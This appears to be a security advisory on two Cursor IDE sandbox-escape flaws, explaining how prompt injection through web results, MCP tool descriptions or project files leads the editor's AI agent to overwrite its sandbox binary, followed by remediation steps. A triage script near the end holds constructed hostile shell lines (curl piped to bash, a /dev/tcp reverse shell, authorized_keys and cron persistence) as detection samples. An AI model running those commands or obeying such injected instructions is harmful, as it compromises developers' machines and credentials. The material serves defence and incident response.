Two critical remote code execution vulnerabilities, collectively named "DuneSlide" and tracked as CVE-2026-50548 and CVE-2026-50549, have been publicly disclosed in the Cursor AI code editor. Both carry a CVSS score of 9.8 and let an attacker escape the application's sandbox and execute arbitrary code on a developer's machine with no deliberate action from the victim — just opening or processing attacker-controlled content is enough.

The flaws were discovered by Cato AI Labs and reported in February 2026. After initially being dismissed, they were escalated, acknowledged, and fixed in Cursor version 3.0 (released April 2026). CVE identifiers were formally assigned in June 2026. Cursor is in use at more than half of Fortune 500 companies. If you use Cursor and have not updated to version 3.0 or later, you are at risk of full system compromise through code you browse, web searches Cursor performs for you, or MCP servers connected to your workspace.

What the Vulnerabilities Are

Cursor integrates an LLM assistant that can execute terminal commands without prompting the user for each action. This design assumes the sandbox protecting command execution is robust. DuneSlide demonstrates it is not.

CVE-2026-50548 — Working Directory Manipulation → Sandbox Binary Overwrite

Cursor allows write access to the current working directory when the LLM executes commands, but fails to validate the working-directory parameter when the LLM sets it dynamically during a session. Through prompt injection — malicious instructions embedded in content Cursor's LLM processes, such as a compromised web-search result, a malicious MCP server tool description, or an attacker-crafted project file — an attacker can cause the LLM to set the working directory to an arbitrary path outside the project. Write access is now incorrectly scoped to that path, and the injected instructions overwrite Cursor's sandbox enforcement binary. On the next command execution, the sandbox is gone and all subsequent commands run unrestricted on the host. This is a complete sandbox escape requiring no user click.

CVE-2026-50549 — Symlink Resolution Failure → Overwrite of Protected Binaries

Cursor attempts to canonicalize file paths during write operations to keep files inside the project boundary. When canonicalization fails, for example because a symlink passes through an inaccessible or non-existent intermediate path, Cursor falls back to trusting the original, un-canonicalized path. That raw path sits inside the project, so the boundary check passes even though the write will not stay there. An attacker can plant a symbolic link inside the project that points at a critical binary outside it, such as the Cursor sandbox helper. When the LLM writes to what it believes is a project-local file, the operating system follows the link and the write lands on the sandbox helper. The next command execution runs without sandbox enforcement, granting arbitrary code execution on the host.

The Attack Path in Practice

Neither exploit requires the developer to do anything unusual:

  1. Developer opens a project in Cursor and performs routine tasks (asking Cursor to research a library, debug code, fetch a URL).
  2. Cursor's LLM fetches content from an attacker-controlled source — a malicious MCP server tool result, a poisoned web search result, or a crafted file in the opened project.
  3. The fetched content contains prompt-injection instructions telling the LLM to execute the DuneSlide exploit steps.
  4. The LLM follows the injected instructions, escapes the sandbox, and executes arbitrary commands as the developer's OS user.
  5. The attacker gains access to everything the developer's account can reach: SSH keys, git credentials, environment variables with API tokens, cloud provider credentials (AWS, GCP, Azure), deployment scripts, and production access.

Why It Matters

  • Developers are the highest-value targets for supply chain attacks. Compromising a developer's workstation is a force multiplier — it exposes every repository, staging environment, CI/CD pipeline, production deployment, and customer database that developer can reach.
  • The attack is zero-click. The victim need not open an attachment, visit a phishing site, or approve any unusual prompt. Cursor's core value proposition — automatically acting on LLM output — is the vulnerability.
  • MCP servers massively expand the attack surface. A malicious or compromised MCP server can inject instructions into every response it returns. Developers with many MCP integrations are exposed to many injection vectors.
  • Once the sandbox is gone, there is no secondary control. The scope of post-escape compromise is limited only by the developer's system permissions.

Am I Affected?

You are affected if you are running any version of Cursor IDE prior to 3.0. Check via Help → About. If your version begins with 2.x or earlier, you are running a vulnerable build. Cursor 3.0 (April 2026) contains the fixes for both CVEs; an additional patch shipped in June 2026 alongside the formal CVE assignment.

Elevated risk applies if you:

  • Use Cursor with MCP servers connected (each is an additional injection surface)
  • Allow Cursor to perform web searches or fetch external URLs during sessions
  • Work on open-source projects where project files could be crafted by contributors
  • Store extensive credentials in environment variables or dotfiles reachable from your dev environment

What to Do About It: Step-by-Step

Step 1: Update Cursor to version 3.0 or later immediately

Download the latest release from cursor.com or use Help → Check for Updates. There is no configuration workaround that prevents these exploits in older versions.

Step 2: Audit your MCP server connections

In Cursor settings, review all connected MCP servers. Remove any you do not actively use or cannot verify. Each connected MCP server is a potential injection vector.

Step 3: Rotate credentials that may have been exposed

If you ran a pre-3.0 version in sessions where it accessed external content, treat your credentials as potentially compromised:

  • Rotate SSH keys: generate a new key pair (ssh-keygen), add the new public key to authorized_keys on every server, confirm you can log in with it, then remove the old key.
  • Rotate API tokens: GitHub, GitLab, AWS, GCP, Azure, Vercel, Netlify, Cloudflare, and any other service reachable from the compromised environment.
  • Rotate secrets stored in .env files, shell profiles, or credential managers.

Step 4: Review your shell history for unexpected commands

tail -n 200 ~/.bash_history
tail -n 200 ~/.zsh_history   # zsh may use another file: echo $HISTFILE

Look for file copies to unusual locations, curl/wget to external IPs, SSH connections to unknown hosts, or base64-encoded payloads.

Step 5: Check for persistence mechanisms

# Cron jobs (user and system)
crontab -l
ls -la /etc/cron.* /etc/crontab

# SSH authorized keys: every line should be a key you recognize
cat ~/.ssh/authorized_keys

# Login items and launch agents (macOS)
ls -la ~/Library/LaunchAgents/ /Library/LaunchAgents/ /Library/LaunchDaemons/

# Systemd user units and desktop autostart entries (Linux)
ls -la ~/.config/systemd/user/ ~/.config/autostart/
systemctl --user list-unit-files --state=enabled

# Shell startup files, newest first (both)
ls -lat ~/.bashrc ~/.bash_profile ~/.zshrc ~/.profile 2>/dev/null
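A triage helper for Steps 4 and 5, as an added example that is not part of the original page: it classifies shell-history lines against the indicator types listed under Step 4 (fetches to raw IPs, base64 decoding, authorized_keys edits, cron and launchd changes, reverse-shell idioms, SSH to hosts) and lists recently modified files in the persistence locations from Step 5. The pattern list is illustrative rather than exhaustive, the sample history is constructed, and 203.0.113.0/24 is a documentation address range, not a real attacker.

```python
import os
import re
import shutil
import tempfile
import time

# Added example, not from the original page. classify_command() tags one history
# line with the first indicator class it matches; scan_history() runs that over
# bash or zsh (EXTENDED_HISTORY) text; persistence_inventory() lists recently
# modified files in the locations Step 5 names. Patterns are illustrative, not
# exhaustive. SAMPLE_HISTORY is constructed; 203.0.113.0/24 is a documentation
# range, not a real address.

INDICATORS = [
    ("remote-fetch", re.compile(r"\b(curl|wget)\b[^|]*\b(\d{1,3}\.){3}\d{1,3}\b")),
    ("base64-decode", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("authorized-keys", re.compile(r">>?\s*\S*\.ssh/authorized_keys")),
    ("cron-edit", re.compile(r"\bcrontab\s+(-e\b|-r\b|-\s*$|[^-\s])")),
    ("launchd-load", re.compile(r"\blaunchctl\s+(load|bootstrap)\b")),
    ("reverse-shell", re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|socket\.socket\(")),
    ("ssh-to-host", re.compile(r"\bssh\s+(-\S+\s+)*\S+@\S+")),
]
ZSH_PREFIX = re.compile(r"^: \d+:\d+;")  # zsh EXTENDED_HISTORY ": <epoch>:<elapsed>;cmd"

SAMPLE_HISTORY = """\
git status
npm install
curl -s http://203.0.113.7/x.sh | bash
echo aGVsbG8= | base64 -d > /tmp/.x
cat key.pub >> ~/.ssh/authorized_keys
ssh deploy@203.0.113.9
bash -i >& /dev/tcp/203.0.113.7/4444 0>&1
: 1718000000:0;wget http://203.0.113.7/a -O /tmp/a
ls -la
(crontab -l; echo "* * * * * /tmp/.x") | crontab -
ssh-keygen -t ed25519
"""

PERSISTENCE_DIRS = [
    "/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily",
    os.path.expanduser("~/Library/LaunchAgents"),
    "/Library/LaunchAgents", "/Library/LaunchDaemons",
    os.path.expanduser("~/.config/systemd/user"),
    os.path.expanduser("~/.config/autostart"),
]


def classify_command(line):
    """Return the first indicator class the command matches, or None."""
    for label, pattern in INDICATORS:
        if pattern.search(line):
            return label
    return None


def scan_history(text):
    """Return (class, command) for every suspicious line in history text."""
    hits = []
    for raw in text.splitlines():
        cmd = ZSH_PREFIX.sub("", raw).strip()
        label = classify_command(cmd)
        if label:
            hits.append((label, cmd))
    return hits


def persistence_inventory(dirs=PERSISTENCE_DIRS, max_age_days=30, now=None):
    """Files directly under the given directories modified within max_age_days.

    Returns (path, age_days) pairs, newest first; missing directories are skipped.
    """
    now = time.time() if now is None else now
    found = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            p = os.path.join(d, name)
            if os.path.isfile(p):
                age = (now - os.path.getmtime(p)) / 86400
                if age <= max_age_days:
                    found.append((p, round(age, 1)))
    return sorted(found, key=lambda item: item[1])


def demo():
    """Run the scanner on SAMPLE_HISTORY and the inventory on a constructed directory."""
    hits = scan_history(SAMPLE_HISTORY)
    base = tempfile.mkdtemp(prefix="triage-demo-")
    try:
        fresh = os.path.join(base, "com.example.updater.plist")  # touched today
        stale = os.path.join(base, "com.vendor.agent.plist")     # ~400 days old
        for p in (fresh, stale):
            open(p, "w").close()
        old = time.time() - 400 * 86400
        os.utime(stale, (old, old))
        recent = persistence_inventory([base, "/nonexistent/dir"])
    finally:
        shutil.rmtree(base)
    return {"hits": hits, "recent": [os.path.basename(p) for p, _ in recent]}


if __name__ == "__main__":
    for label, cmd in scan_history(SAMPLE_HISTORY):
        print(f"{label:16} {cmd}")
    for path, age in persistence_inventory():
        print(f"modified {age:5.1f} days ago: {path}")
```

For real triage, feed `scan_history()` the contents of `~/.bash_history` and `$HISTFILE` and run `persistence_inventory()` with the default directories. A hit is a lead, not a verdict: check each one against what you remember doing, and extend `INDICATORS` with the tools your team actually uses so the noise stays low.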

Step 6: Add network-level monitoring for your dev environment

Consider running Cursor (and other AI IDE tools) inside a network namespace or VM that limits outbound connections to known-good destinations. This does not prevent DuneSlide but limits post-exploitation network activity.

Quick-Win Checklist

  • Updated Cursor IDE to version 3.0 or later on all development machines
  • Verified the version via Help → About — confirmed 3.0+
  • Audited and pruned MCP server connections
  • Rotated SSH keys for all servers reachable from the dev environment
  • Rotated API tokens (GitHub, cloud providers, deployment services, databases)
  • Reviewed shell history for unexpected commands
  • Checked authorized_keys, cron jobs, and login items for persistence
  • Communicated the update requirement to other developers on the team
